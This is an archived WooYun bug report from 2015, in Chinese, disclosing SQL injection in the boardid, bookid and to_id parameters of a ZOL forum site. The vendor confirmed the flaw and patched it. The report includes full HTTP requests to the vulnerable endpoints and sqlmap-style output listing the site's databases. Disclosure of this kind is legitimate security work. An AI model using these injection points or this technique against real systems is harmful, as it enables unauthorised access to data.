乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-03: 细节已通知厂商并且等待厂商处理中 2015-03-03: 厂商已经确认,细节仅向厂商公开 2015-03-03: 厂商已经修复漏洞并主动公开,细节向公众公开
站点参数boardid bookid注入
GET /ajax/book2014/get_new_message.php?boardid=231&bookid=749985&replys=207&pingfenNum=2&t=142522087 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5Referer: http://diybbs.zol.com.cn/75/231_749985.html?via=handWorkClickX-Requested-With: XMLHttpRequestCache-Control: no-cacheX-Forwarded-For: 127.0.0.1Host: diybbs.zol.com.cnAccept-Encoding: gzip, deflate
[09:10:42] [INFO] fetching database names[09:10:42] [INFO] fetching number of databases[09:10:42] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[09:10:42] [INFO] retrieved: 11current user: '[email protected]%'available databases [11]:[*] information_schema[*] mysql[*] test[*] z_diybbs[*] z_gigabyte[*] z_gpsbbs[*] z_lepad[*] z_lephone[*] z_oabbs[*] z_postbbs[*] z_techbb
另外:to_id%5B%5D也存在注入
GET /ajax/book2013/get_replynum.php?boardid=198&bookid=128883&to_id%5B%5D=924998 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5Referer: http://diybbs.zol.com.cn/13/198_128883.html?via=handWorkClickX-Requested-With: XMLHttpRequestCache-Control: no-cacheX-Forwarded-For: 127.0.0.1Host: diybbs.zol.com.cnAccept-Encoding: gzip, deflate
危害等级:高
漏洞Rank:15
确认时间:2015-03-03 09:48
感谢“Forever80s”,漏洞已经修补,乌云有你更精彩~~
2015-03-03:感谢“Forever80s”,漏洞已经修补,乌云有你更精彩~~
2015-03-03:漏洞已经修补